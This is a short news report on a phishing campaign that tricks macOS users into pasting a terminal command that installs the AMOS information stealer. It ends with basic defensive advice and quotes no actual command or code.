A new attack on macOS users has been detected by the company CloudSek. The attackers, likely from Russia, are distributing malware called AtomicOS (AMOS), which steals passwords, crypto wallets, and system data. The attack is carried out via social engineering. Users are tricked into manually running a dangerous command in the terminal.
According to The Hacker News, the hackers created a series of phishing websites that imitate the support pages of a popular provider. When victims open such a page, they are asked to complete a “bot check.” This check deliberately fails, and the user is then offered an “alternative” option: to copy a command from the clipboard and paste it into the terminal.
This command downloads AMOS — a known piece of malware for macOS that collects credentials, cookies, crypto wallet info, autofill data, and even screenshots from the device. Researchers found comments in Russian in the site’s source code, confirming the involvement of Russian-speaking cybercriminals.
A bit more about AMOS:
It is an information stealer for macOS that first appeared in 2023. It is sold on the darknet as a subscription service. It is actively used to target crypto traders, journalists, and tech workers.
The attack is not aimed at specific companies or countries — any macOS user can be a victim, especially those searching for tech support or services via search engines. CloudSek notes the phishing sites are poorly designed, with confusing instructions and interface elements for other operating systems, but this does not reduce the threat.
What you should do:
- Do not run commands from suspicious sources.
- Always verify the URLs of official websites.
- Install antivirus and activity monitoring software for macOS.
- Enable two-factor authentication.
